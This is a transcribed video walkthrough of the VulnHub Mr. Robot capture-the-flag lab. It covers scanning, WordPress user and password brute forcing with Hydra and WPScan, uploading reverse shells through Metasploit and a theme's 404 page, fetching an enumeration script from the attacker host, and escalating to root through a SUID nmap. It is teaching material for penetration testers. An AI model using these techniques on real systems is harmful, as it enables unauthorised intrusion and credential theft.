Good evening, guys. So this is like probably the fourth time I'm trying to record this, between background noise, between the Zoom, between the thing not recording, and that. So let's hopefully this is the final version because I am now really tired of doing Mr. Robot, to be quite honest. So we are doing Mr. Robot, and let's do a nmap scan. So few things. I've enabled this box to actually have internet access for a change, so I can show you guys live here. And I did like the one recording I did, I actually did proper notes, so I'm not going to do notes, we're just going to bounce through those notes. So let's start off with an nmap IP address. Let me just make double sure the recording is started. Yeah, recording has started and it's still running. Okay, cool. 107, 107, all outputs, and we're gonna call this top 1000 ports. Okay, so you guys saw I used the -OA flag, and that gives us all outputs. So there's three output formats. There's grippable format, there's grep format, normal nmap format, and XML. I don't use the XML, but there is a nmap XML to HTTP. Pretty much this is how one of the wrapper looks like. This wrapper here that the guys has built. Never used that, but yeah, can do that. I just use mostly the .nmap and the grep nmap if I'm using larger, so that's all that does. So from the scan we see there's two ports open, port 80, port 443. So let's go do some version scanning to see if we can get some more information on those. -P 443 192.168.56 107 dash, again all outputs, and this is gonna be version on port 80 443. Okay, let's see what we find. Okay, so let's come back. As you guys can see, we got some more information. It's saying it's Apache. It doesn't give us any more information like Apache 2.4 that we could have then gone and go look at what version would ship with Apache 2.4, so then you can probably identify most of the time with the information that you gathered what operating systems in the background. It's safe to say, well, it's not safe to say, it's 50-50, but it's just Apache, so probably a Linux box. But yeah, doesn't give us much more. So let's quickly go do some housekeeping. I'll put the ports there that was open. I'll put the version scan that was there, and we're gonna fire off a all port scan. And basically, to explain this to you guys, if we do -P, you can specify single port, you can specify multi-ports. By doing this, you're actually saying 0 to 65553 TCP. Okay, so that's pretty much what that dash does. Okay, give it the IP address. 107, again, print output, putting it to output. All port scan. If I get something back on the all port scan, I will do a version scan on that also. Okay, so we don't have anything further to play around with, so let's go see the website. First we go to HTTP, and then at the same time we can open HTTPS 192.168. Okay, well that's loading. Let's look if we can get if there's any information on the certificate. So we can go view certificate, details, and let's see, can we get anything? Yeah. So we have an email address there. So I would note that down. Not gonna do that, but yeah. Nothing further. Let's go see if we can see anything in the back. Yeah, so this is pretty much if you control U, or if you go control view page source. So if I go on this one and I go right click and I go to view page source, you can see it's similar. Basically what we're trying to do here is maybe, well, we're trying to see this information about what's the website running. Is it running WordPress, Joomla, any kind of that kind of information. Also sometimes if the developer did some testing or coding in pre-prod, and then maybe commented it out and it got pushed to production. Also web links, anything like that. Looking at this, we're not seeing much, and this is still loading. Okay, we've checked the similar one for this one. Same, not much information. Okay, cool. Let's just quickly load. Okay, I would then enumerate. They look both exactly the same, so I'm gonna drop the HTTPS and just gonna keep the HTTP. I'm gonna put burp on now. Burp suite. This is Foxy Proxy. Pretty much allows you to set up your proxy. It supports HTTP, SOX5, a whole lot of proxies. Nice, set up your that color code. Quite a nice tool to have. Okay, let's do. Let's make sure it's going to burp. And there we see we're getting a hit. We're getting a directory called video. So let's see, can we access that? Okay, so we can access that. Same video is playing in there. So we know we can get to that path. So if it's like directory traversal, oh well, if I can upload something, if I can somewhere upload, I could then upload it into that and then can call it from there. So we've got a directory there. Going further, there's not much on this application that you will get from here. So what I would do now is I'm gonna start GoBuster. Our full port scan came back, nothing new. So those are the IP address that we have. So I'm not gonna actually run GoBuster. I already ran it just to save some time. So we would do gobuster.h. So we need to give it, let's see. So we need to give it the URL, and we need to give it, so if we're going to search for specific extensions, we're not going to search for that, we're just going to give it the -u and the -w flag for word list. And GoBuster-h for the guys that's checking videos about GoBusters. This GoBuster changed about sometime last year, where it supports directory, so that's directory brute forcing DNS. So some of the older videos that's out there would be just GoBuster-u. This doesn't work with this version. You have to specify the DR for directory brute forcing. So just always remember to check. Let's try it. GoBuster directory -url http 10/192.168.56.107 W for wordless user share the word list. -o. So -o is for output. GoBuster 80, and then if you do pipe t, you will actually see when it runs, it will actually give you output into the console, where if you don't do the pipe t, it will just write to file, you don't see anything. I'm not gonna run this, already ran this. I'm gonna cat GoBuster port 80 and let's see what we found. So there's the videos one that we found. If you enumerated some more, you'll see there's an audio one. We see this WP contents, and immediately, if you've been doing this for a while, WP contents means WordPress. So there's a WordPress running in the background. But also we see robots, so that's probably, and it's a 200, so there's a robots.txt file. So let's go see what's in robots.txt. Robots.txt. And as you guys can see, there is a dictionary and a key 1 of 3. So this is a capture the flag, so there's 3 keys. Not important for it's just how that they work. Hack the box also has 2 flags normally, user flag and root flag, and that's how you get your points for hack the box. But in any case, if there's robots.txt, it's worthwhile to go look at it, guys. I found on an assessment that I had once where they were blocking certain things in the WordPress, but when I managed, they had a robots.txt and I could actually see what they allow, and that's actually how I was able to execute some stuff. So it's always good to go check these things out. Let's quickly go grab this. Let's just raw cd raw, remove f society and remove key. So I already have done this, like I said, I've done this a couple of times, but let's quickly grab this. wget.http 192.168.56.107. cool, and then up arrow, okay, cat key, okay, and you'll see I've added them. Yeah, it's just a habit of hack the box, and so I'm just adding the keys there. Also added a note, found, could actually update here that we found this to make notes actually correct. Okay, cool. So we know it's WordPress, right? So we should be able to go to WP admin, and we get to a login page, right? So WordPress in Joomla has a administrator backend, and this is what is the administrator backend. So let's see if we do Control U, or let me do view source, if we can find something that gives us what version of WordPress this is, so it makes enumeration a bit easier. And as you guys can see, yeah, copy location, and it pretty much tells us it's version 4.3.1. So what we can do now is we can quickly go search WordPress 4.3, we can see then when it was released, summary of what was changed, so what security fixes there were, so you can go read through all of this. What files does it come shipping with, so that you can enumerate files if you can access this. If you maybe just run like the one GoBuster and you picked up WordPress, or you know it's WordPress by something else, you don't want to run the whole list through. Now we've got this information, we can build a word list from this and run it like that. Okay, cool. So we got some information there. Is there anything else that we can get from this? Let's see. My cat's decided to come join the hacking. So if you guys are hearing a purring noise, that's only my cat. Let's see. I don't see anything new. Okay, cool. So there were some very smart people that created some enumeration tools. One of those tools that they created was WP Scan. So WP Scan -h. So let's see. And I do apologize, this is gonna take some time because I'm using Tmux, and my Tmux is set customly up for me, but I've been in training in the beginning of the week where I was using a virtual host and running Tmux and that default keys of Tmux is different than my Tmux keys, so I'm been pressing the whole time Control B now, where my keys are Control A. So yeah, if you see a 0 or something popping up there, that's just me trying to switch between my panes, but I'm using the wrong binding key. So hopefully by the end of this video I'll be back to my setup. Okay, so let's see. So this was the smart people that created WP Scan. So we need to give it a URL. It's got a supports output file. It supports formats that we want to supply. It gives there. You can do custom URL agents if it's required. You can push it through proxy. You can enumerate vulnerable plugins, all plugins, all themes. So this basically has a, when you do WP Scan, it builds up a caches a database of this. So you'll see when I'm running it now, it's going to ask me, do I want to update? If I say yes, it will then update to the newest cache that's built, and then if there's any newer vulnerabilities will be listed there. So we want to enumerate the site, but also a nice function of what it has, it can also do brute forcing. So cool. But for our sake, we just want to enumerate the site. And for us, we need to give it --URL. 168.56.107. We need to give it the -e flag because we want to enumerate. We want to do pretty much VP, IP, BT, IT, and there's what it does. So as I'm saying it, you can reference to there. T definitive. We definitely want to do CB if there's any default backups, and DBE. Cool. Output, we're just gonna call this WP Scan, and I'm gonna pipe it through T so I can actually have output to my screen. Or not output to my screen. Okay. Maybe was something there? I don't know. Oh man, this bindings. Okay, cool. That's WP Scan, cat, cool. Let's see what we got from here. So it picks up the robots.txt. This is quite interesting. So this is actually WordPress API, and cool. So basically explains to you what it does. There's a couple of nice things unauthenticated you can do. Then we can list the modules. You can also validate credentials through this. You can test port scanning, see what ports. There's a lot of things that you can do with this, and it's worthwhile to, if this is open, to enumerate this more. I'm not going to go down this path because there's other stuff that I actually want to show you guys, but it's worthwhile to go read up what you can do with this service if you find it. And then also, yeah, let's leave it there. Okay, so we got that. We'd want to go check what this is. And then it says nothing, no vulnerabilities found. So then I would go update that on WP scan, got the version there. Cool. So we haven't found much there to exploit, so let's go and back to the website and let's see. So WordPress should have a default user, right? WordPress default user, WordPress user should be admin. Okay, so if we try admin, and most admin password, admin root, it says invalid user. So it doesn't say user or user and password invalid, or user, no, generic error message. It's specific, it says invalid user. So then what I would try is try something that really shouldn't be a valid user. I mean, QWERTY ASDF ZXCA123, that should really not be a valid user, and we still get invalid users. So that tells me I can then enumerate users. I can brute force users, but I can also, well, I can enumerate users, and there's a couple of methods you can do it. Let's go to, let's keep bindings. So as you guys can see, 0 on my screen. So there's a couple of methods you can do. So when I did this box, Hydra was an option. I'll show you guys Hydra. Another option would be WP scan. You can also do it. And there is the API. There is WFuzz. I'm sure Metasploit probably has something to brute force users, so there's a lot of options. I'm going to show you guys two. I'm going to show you the Hydra one, and I'm going to show you the Metasploit one. Not the Metasploit one, sorry, the WP scan one, and I'm going to show you guys the one that I created. This WP scan. WP user new. So let's quickly run this one, and it's quite easy. You just specify your user list. You specify the website. It filters for invalid. So if we get this response back, then it's not a valid. If we get anything else, print that out, and that should be a valid user. So, and the valid user is Elliot. If you guys know Mr. Robot series, he's one of the main characters. Why I'm showing you guys this is because you can actually develop. This is also why you guys have your projects that you have to write stuff, because this is stuff that you need. The other tools are there, but I mean, this just simply, you'll see the other commands I have to remember a whole lot of input parameters. This I could troubleshoot. I think it took me 20 minutes to build, maybe 25 minutes, and I can reuse it now as much as I want. But let's move on. So now we have to do Hydra. So let's quickly go see Hydra -H. And as you guys can see, Hydra has quite a lot of options. So what do we want to do? So we want to brute force a user. So let's see. Normally L's for login and capital L for file. So we need to specify capital L. We're not going to brute force passwords yet. So we can small passwords. We want to write to out file probably. And then we are going to have to post request. So Hydra supports quite a huge, quite a lot of amount of services. As you guys can see, yeah, there's a whole list of services. So we want to do HTTP proxy now, HTTP get and post form. Cool. I'm gonna push this through to the proxy because there is some false positives. So one way to enumerate false positives, and it's a very good way to do, is to send your traffic through a proxy, and at this point it's going to go through to our burp, so we can look at our burp logs. So this one works with setting the parameter here. Let me just get out here. My interface is loaded into all. Cool, so I'm exporting that. So next, let's do Hydra. Oof. So we set -L user -p. We can give it any password. We need to give it the IP address. And then we have to give it post form, and then we have to give it parameters, and those parameters would be, we need to give it the post, and then parameters we have to give also is log, pw submit, login. Okay, cool. So wp login. Okay, so we've gotten that. Then we need to go log equals user and pwd equals plus, and then I think it's wp something, wp dash submit equals, what was it this equal, log plus in, log plus in, fault equals invalid username. Let's see, we're giving it the user, we're giving it the password, we're giving it the user list, we're giving it the password, we're giving the house, we're giving that. And okay, cool, let's fire it off. And as you can see, it came back with the user is Elliot, but let's quickly go and see. 1, 2, 3, 4, 80. That looks, yeah, okay. Looks a bit weird. My bulb's acting up. In any case, here we can see we have the login attempts. I'm just gonna filter for invalid user. So pretty much all these that's links are 407 that's invalid, and then we see we've got one that's that. And if we go read what it says error, the password you have entered. Cool. So that's why we send it through the proxy, so that if there was false positives, we could still read the error messages. And if I remember correctly, false positives with the password. So next we have to brute force the password. So let's quickly do this. We know the user, so no point to brute force the user again. Elliot. Password we want to brute force as capital P. Passwords, that stays the same. This would change, and okay, cool. And as you guys can see, it says here that all 6 were valid passwords were found, and that's definitely not correct. So let's go look at burp. Okay, so now if we see, so that means all these, that's 4128s, are incorrect passwords, but then we have this one here, that's 1078, and if we look at its response, you can see it's setting the cookies. So there we go, successful login. So now we have the username and password. So Hydra, username, password, the payload used for the user, the payload used. So this payload use you would put into your report. So for whoever does the retest, there's exactly the payload that you did, and it just makes for the person that's retesting its life much easier to give it as much information for the person that's going to retest. So very important. Let's do WP scan. WP scan, and my one headset is complaining that it's gonna switch off now, and I'm listening to music in the background, so let me just switch to my other pair of headsets. Okay, let's see. Bluetooth. Okay, let's do 1, 2. That's there. Switch this one off. Just give me 1 second, guys. Let's just sort out this audio. Okay. And then if I should go back. Okay, cool. Audio's there. Let's just make sure the recording is still happening. Okay, cool. So WP scan. Okay, recording stop there. Okay, WP scan. So we need to give it the URL dash URL. Okay, then we need to give it dash U users dash P. I'm gonna do both the users and the passwords, and that looks about it. No, don't want to update anything. And found valid username and password. And that's how you brute force with WP scan and with Hydra. Cool. So now we've got valid credentials, right? So now we can actually log into the website. Let me just copy quickly what is the valid credentials. Okay. Cool. Valid credentials. Logged in. Now we start enumerating. Let's go to all users. Let's go see what users. So we have Elliot. Elliot is administrator, so we've got administrative rights. And as you guys can see, there's no admin account, so they change the admin account, or probably disable the admin account, or change the admin account to a custom user. And then there's this user. So let's go first look at Elliot. So Elliot, first name, last name, nickname, email address. So we capture all that information, because you never know when you're going to need to reuse that information. Then you got valid email addresses. Let's go look at the second user. Username, first name, last name, email address. Okay, cool. So we are administrator, and we can confirm the version is that. Right. So let's go see Searchploit WordPress 4.3. So WordPress, Searchploit DB is exploit DB, and if you put exactly WordPress 4.3, you'll see exactly the same output. If you don't have it on your computer, it comes default by Kali, you can go to the GitHub site. You can clone this and explains you how to use it. Very nice. You can keep it up. You can update it, and as you guys can see, it was actually updated 16 hours ago. So that's one method of finding. So let's go see what we got here. So we know it's 4.3, so that's not gonna work. Not gonna work. It's one revision up, so might worthwhile to check this. This is one revision down, so definitely gonna check this, and then the rest of these are not from. Okay, so let's go see this one on the website. I said so WordPress first plugin. Okay, so this is actually a plugin that you needs to be installed or have to install. So let's go see. Simple Press. do we have a plugin called Simple Press? Let me just zoom a bit out. Simple. And as you guys can see, we don't have that plugin. So that exploit's not going to work for us. I mean, we can install it, but that means we're installing actual software onto a customer's website, so that's not a good idea. And we also don't know actually the database. If we go see, yeah, can we find anything for the database? Yeah. Nope, we can't find anything for the database, so we can't do that method. But we got administrative right. You can go enumerate this page further, but we're not going to find much yet. So let's see, there's a method of getting a reverse shell. Let's see if we can write to this. We're administrators, so you should be able to write to it. Okay, cool, we can write to this. So I'm going to do a reverse shell on this, but I'm also going to do a reverse shell on Metasploit, so let's do that. Oh, man. Our shell, reverse shells, msfdb run. So I don't know how much you guys have used Metasploit. Well, I'm doing MSF instead of MSF console. MSFDB run starts the database. The database is not really started, so we have recursive lookup. I like having recursive lookup on my history. If you start Metasploit normally and you've configured with the database, you first have to have the database start and then you have to install. So that's why I'm doing it that way. So let's see. Search WordPress. So let's see what we have. So we have admin. So admin. It should be exploit. So let's see. So we have an exploit with that. jQuery upload. No. Web admin upload WordPress admin shell. Okay, that sounds good. Let's see what we need. Clear use info. This module will generate a plugin. Okay, so this actually abuses the plugin, not the. So mine, I'm going to be doing the theme, the appearance. This is actually going to do a plugin. So let's do this. Options. We need to set the password. And that's what I love. I did this like ready because I have the database that I can just get from my passwords again. Control R, set our host, that's right. Set user, set payload. Yep. Options. So basically setting the payload the spot here, so I can set this now up, so I can just set I'll host. So this is our details. ETH1 options, because I specify another IPA. So this is, I'm just giving it this interface, so it pulls the IP address for me there already. because I know this interface here is my internet breakout, this is my internal between Mr. Robot and my box, so that's why I did that. Or you can type in the IP address. I just think that's short to do it that way. Always double check that it did take. Set allhost 9002. Again, options. Let's check everything. So that's WordPress. That's there. That's there. Cool. Run. Actually I checked it, but I don't check that. Set allhost. I actually changed it to the wrong interface. Set allport. Oh, that looks better. Okay, if you check your command, just make sure you actually check it. This is info. Cool. So now we're on the box. And if you look here, WP content, plugins, and then that. So theoretically, if we search for that here, we find that. So make a note of it. This will be in your cleanup operation. You can remove it, but always keep it there in any case in your cleanup operation. So give them the path. I've got a screenshot of that. In case you forget to clean it up, it's in your report. They will clean it up then. Cool. So that's one method of doing it. Getting your shell. Let's do the second method. I'm not going to close this. I'm going to keep this open. And I'm going to go into dub. Okay, cool. Remove shell. Okay, cool. Clear. So this on Upcali, there's a nice default shell. You can also go download it. They got a GitHub page. PHP reverse shells. Oh yeah, shell.php. Then I copied it here. I renamed it for me via shell PHP. Big screen. This one's a bit easier. We just have to give it our IP address. And we have to give it a port. Since we're using 9002, gonna be 9001. We're gonna then spawn up a bin sh because we're not too sure if bin bash is supported. So let's do that. Leave batch shell. Copy. Appearance edit. We want to do the 404 page. We want to check if everything's correct here. IP, that's correct. Update. And now if we go to that and we just give it some junk, it will go to a 404 page. And I forgot to start my listener. nc-lvnp9001. Refresh page. And voila. Who am I? Who am I? Okay, cool. So we're now on the box with the shell. But it's a really crappy shell actually. So let's upgrade this to a Python shell. And first we need to see if Python is there. Which Python? Okay, cool. So if I'm gonna go which Python 4, because you guys know there's no Python 4. Sorry, which Python 4. It comes back with nothing, doesn't give us a path. But when I go which Python, it comes back with a path. Which Python 3, it comes back with a path. So that's how you can enumerate if there's Python, or if you want to enumerate if there's which bash. So now we know there's bash on there, which nc, so bin dash nc dash h. Cool. This one does not support dash e, so we can't do a reverse shell. So let's say we got a command execution on the website, not a reverse shell, then this is like we would want to see, okay, can we use nc to get a reverse shell and enumerate stuff like that, but this doesn't have the dash e flag. And then if you guys go to pen test monkeys, pen test reverse cheat sheet, so we know bash is there, we know Python is there, PHP is cool, nc we can't use nc because it doesn't have the dash e support. So those are the stuff that you need to enumerate for. But yeah, so we've got Python, so let's upgrade our shell. Python c import pty dot spawn slash bin bash. Cool. Okay, so now we're on the box, right? Let's go and look where we are, and that's quite interesting because normally, I mean, with the server was running Apache, and normally most of the time if you exploit it, you would be running as Apache user, we're running as Debian user, we're not in a web directory, we're in the root directory. So let's go see if there is a web under var/dub where it would normally be Apache, and we see there's nothing, there's no dub, so Apache configurations are not there. So now we can go enumerate further. So that's not there. Let's go see, do we have a home directory? Is there anything in the home directory? Okay, ls -i. So when you got this user, we got read permissions on it, so we can go there. ls-la. There's two files in there. One is only readable by the user. This one is read and write by the user, read by us, and read by groups. Let me just check where my audio went, because it's now just having static noise there in the background. That's not working for me. Yeah, okay, so that's not working for me. Let's go grab some audio from here. And I just want to see, sorry guys, I just want to check out my audio. Okay, that sounds a bit better. Okay, cool. Okay, so we need to somehow also go check quickly if there's any other users. So we got this, and we got root, and that's about that. So we need to now see how we can at least try to get to this user. I would also quickly just put etc password into your You always have it, you need to go back to stuff. Let me do this. Sorry, this is not bothering me. Let me kill that. This audio is not set up correctly on these mics. Okay, and make sure we are still recording. Cool. Okay, so we've got that. Going back to this user directory, we had this password and we can read it. So let's see what's in it. And then we got a robot and we got a hash. So I would normally crack this through hash crack, but yeah, I'm not gonna do that now. Like we said, never ever put any of the customers' hashes online. This is Vulnhub box, so I don't mind doing that. Going to go to crack station, and I don't want my fan to spin up and then you guys don't hear anything in any case. Okay, check it, boom, decrypted it, put the password in your notes. Well, we first need to verify for which password this is, but if you guys can remember, clear cat top nmap SSH was closed, so we got the SSH in, but you can switch user. Yeah, you just go to we're thinking this is the only other user. Okay, cool. We could also test this with root. Maybe they reused the password. No. Okay, cool. So now with this user, let's dash LA. We can cat key. We can cat the key now because we can actually now read it. Cool. Got the key. Updated it. Screenshot from how I got it. Cool. Now we need to see how to get to root, or if there's anything else on the network. So if I do a IPA, we only got one interface, 107. If I do a ARP-A, it's pretty much only talking to my box. If it was maybe another box, like let's say I was on a 10.10 subnet and this wasn't my Kali's box IP address, then that would be another box to look at. So this is manual enumeration. There is tools to do automated enumeration. I do a lot of enumeration manually on even Hack the Box and that. I don't like automating tools and that, but yeah, there is some nice automated tools out there, but disclaimer, you don't run anything that you don't know how it works. If you can't do it manually, don't run it. So the one that I'm going to show you guys is a new one that I got, one piece. It supports Linux, Windows, and it's going to eventually support Mac. I actually am busy modifying it because there's some outputs that I want displayed differently, but this version that I'm going to show you guys now is just stock standard version. And let's go create another one. Raw, no, dub. It's already, yeah, cool. Where I got it from is, if you go yeah, and you go one piece GitHub escalation script, and of course there's learn piece. It was updated 2 days ago, so I must actually do an update on mine. And for you guys that want to know actually how you do update, if you just downloaded something already from GitHub, let me just split this. Let me go to my GitHub directory. Awesome git. You just do git pull it will pull the master original your local changes following files will override and merge. Then please commit your changes or so. And that's how you would do that. We're not going to do that now. We've got it here. We need to get it onto another box. Easiest method is to do a simple HTTP server 8000. Let's go back to the box. And I normally go in here, sorry, cd dev ggm. So this is just like a cache directory. So anything that you put in here, if the server gets restarted or anything gets restarted, it gets wiped out. And also it's a good place to have. You can either use like /temp or this to have a constant place where you would work with files. One disclaimer is always check if there's like no execute set on it. So if you do a mount, and that's also for /temp, you can also check if /temp or anything like that doesn't have. Let's see quickly where are we now, kernel blah blah blah. See, there's nothing like that. But if we went into this directory, we couldn't because it's got no execute, so we can't execute anything. But this one is fine. So let's do wget http 192.168.56.108 port 8000, and then what did I call it? /http Vulnhub Mr. Robot cool. It'll download, got it downloaded, chmod plus execute that. We can execute that cmd. I'm just going to give it to out. Well, this we can just run like that. I'm not even going to do it to out file. Normally do it to out file. I'm not going to do it to out file. Since it's in my Tmax has like a 20,000 or 30,000 buffer. Don't need to have it onto out file. Let this run. Okay, cool. Let us get to the top of the line. Okay, cool. So there we ran it. It's got a nice little logo, version. It explains to you how it works. You must take a look at it. User with console, user without console. That cool. Let's see what it does. So once it flags as the Linux version and 4.8, so you can go Google, or don't even have to go Google, you can just go create search exploit Ubuntu 10.4. There's all that you can go through to. Same methodology, read up on it, make sure. But yeah, there's definitely some exploits there. We'll get back to that if we don't find anything else. So let's make a note of that. Where did I make a note? There we go. Make note of that. Let's go back up here. Let's go read further. Pseudo version. That also, if I look at sudo dash dash version, I think. So it's iteration 31. That's 5. It's not flagging it, but yeah, it's worthwhile. Make a note of it because we're gonna go start looking at these things once we're done. Okay, then what else we got here? That gives you the Ubuntu version, gives you disk space, disk, software, processes, running as root. I skipped this in the beginning because normally if there's a process that I was looking at, it will be in the cron tab first. So I normally go through the cron tabs. These are these ones here. If there's like a custom cron, like let's say backup DB, it will be say yeah, then I can go look, yeah, okay, so there's a cron tab. Is it running as root? Yes, it's running as root, so it's worthwhile exploring those running as that user. That's always first check cron tabs, then I check processes, but there's nothing in the cron tab. Host name. Look if there's any other name servers, nothing. Network, one interface, op table, routing table, sorry, routes, there's nothing, there's no IP table, so there's no, sure, how do I explain this, IP tables, I think dash H, so there's no IP tables blocking or allowing. This is like a firewall method that you can do. Some companies still use that. Cool. Some yes, very important. Just look if there's like, we can see 336. So there is a database server running. It's only accessible on 127. So let's do this quickly. Copy. Enter MySQL MySQL dash u root dash p. Nothing. MySQL dash u root which MySQL. Okay, so there's no MySQL. So if there was like MySQL, you could do that and connect to the database. I can do probably some tunneling to hit that, and I can access it from my box. So see, so this, so I could potentially do a tunnel to that port if I want to go through, if I really want to check what's on there. So there's though not SSH. I'll do it by myself. I'm not gonna record that, and yeah, basically there's other methods of doing tunnel. I don't really want to show that now because you guys are all used to doing it through SSH, and I'm just scared I might confuse, so let's not do that. But I'll look at that, and once I've done looking at it, I might think of recording it. I'll see, but for now that's okay. I'm not gonna go do that. But yeah, you would set up a tunnel, and then on this one you would have the so what we're gonna try -p and some flag that you have to give for the IP address. Can't remember out of the top of my head. And that IP address would then be 127.0.0 because you're getting it on the. But in any case, I'll still look at that. where were we? Oh yeah, we were still looking. Yeah, okay, cool. So yeah, that's also always important to see what services are running. Like I said, they're not always exposed, so there might be a PHP my admin. There might be yeah, there's a lot of services, so always check. Oh, not service, yeah, services. Always check. Like you can see, this one also FTP is actually listening, so I can do the same thing. I'm gonna port forward to FTP. Then from my box, I can see what's on FTP. These are on all interfaces. That's why we can access them. And those are reverse shells. Next we have the sudos. Okay, I've got that still in my clipboard, so let's do. So because we have a user and we have a password, whether we have a user or password, it's always good to check if you can do sudo -l, and it's going to require full password. So if it was set up that it requires no password, then we're going to prompt with a password. It's prompting for password. We know what's the password. Let me just do this. I just don't want to lose my search. And we know that's the user password. Copy. Put that there. And you can see it's not part of the sudos. So always worthwhile to check what sudo runs as a super user. So it might be that you have specific rights, or you might have all rights. I've had it where the customer's given this user full sudo rights. You can do everything, got his password, could use it, so was root on the system. So it's always a good thing to check. But yeah, we're not part of the sudos, so nothing we can do there. Let's copy this, go back here, go back into my search mode and go search for that. So we're back here. Okay, cool. Sudo. Also, what's quite cool, I like about this thing, it does do as. So do as is, I don't know exactly when it was released, it's not really new. It's like sudos, but where sudo caches your credentials for a certain period, do as requires the credentials. So like if you do a, like, I mean, even you guys from Kali, if you do not Kali on your Ubuntu, if you do a sudo apt update and then you do a sudo, it will prompt you for a password, and if you do a sudo apt upgrade and then it doesn't ask you for a password if you've done it in a certain period, that's because it caches a do as every time. That's one of the functions. There's many more. Actually currently running it on one of my boxes. It's quite a nice tool. That's pretty much nothing. That gives us the password policy. That's quite nice. So it couldn't find any default credentials for MySQL, Postgres, Apache, WordPress. So it even looks for WordPress. That's quite nice. Mongo. Okay, nothing there. Looking for Wi-Fi. I mean, this is like Wi-Fi stored, the credentials stored. No LDAP. Yeah, SSH. So there's no credentials for AWS or Azure found. There's no component server. Cool. Let's see. Okay, next. Issue ID. Okay. So basically, the issue ID is a type of permission which gives the file. How can I say? So let's say this one is now highlighted, right? I'll copy it. I'm gonna go ls. ls-l. So you can see there's a S. So basically this gives any user can run this if it has like we got execute, can run it. But when we run it, it will run as the permissions of the owner, and the owner of this would be root. So if we ran this, we would be able to, if it was like command execution or something, then we could execute commands as root. Okay, and there's the S there, as you can see. Now, what's interesting is nmap shouldn't be by default on the box. I mean, this is Mr. Robot. It's also highlighted. So let's go see nmap.h, right? And as you guys can see, yeah, it's a small list of commands, and then right here at the bottom there's a dash interact, right? nmap-h, so mine, whole lot of crap, and not really anything there. That's not a way to look at what I'm just showing. So first let's go do nmap -- version, I think. Yeah, so this is 3.8. So our version of nmap 7.8. So that's a very old version. When there's old versions, there's normally some way of exploiting it. So let's go research. Okay, let's see this one. Cool. So this one actually explains also the SUID, on which applications, how to search for it manually. So this is pretty much what LandPiece does. Check what version it is, and from version 2.02 to 2.21 this -- interact was supported, and after that, so version 5.22 wouldn't have it. And then you guys can see you pretty much would go nmap -- interact, and then yeah, let's go see what that does. nmap -- let me just make sure it's still recording. Okay, it looks like it. nmap interactive. Cool. Help. Let's see what helps. So we have this run shell commands. So for people that know Vim, that would have been like a no-brainer. If I clear this, if I go Vim hello world, I'm in Vim, I can do that, I can do IPA, so I can actually run commands from Vim. That's pretty much what that's doing there. So if I do that, who am I? We are root. sh what was it? So tight. This sh, I don't have to escape that. Sh, boom. Who am I? Root pwd / root get key. There we got the third key. If you go back, so we've got the box now. We were looking at the sudoers. Not the sudoers, but the actual application. So let's go out of here. Let's clear this, do search exploit sudo 1.8, and then we can check here. So there's nothing really for our version. No, so there's nothing here. and then for the kernel we had a lot of exploits there. And that is the box. Hopefully this recording is right and that I don't have to do this again. If there's any questions, you can email to me. I'll probably only do the tunneling to that port over the weekend, so I might pop email on that also. But yeah, hopefully that helps you guys. Key part to take away, I would say, take as much notes as you can and enumerate. Read up. There's a lot of reading. Okay, cool. Thanks guys.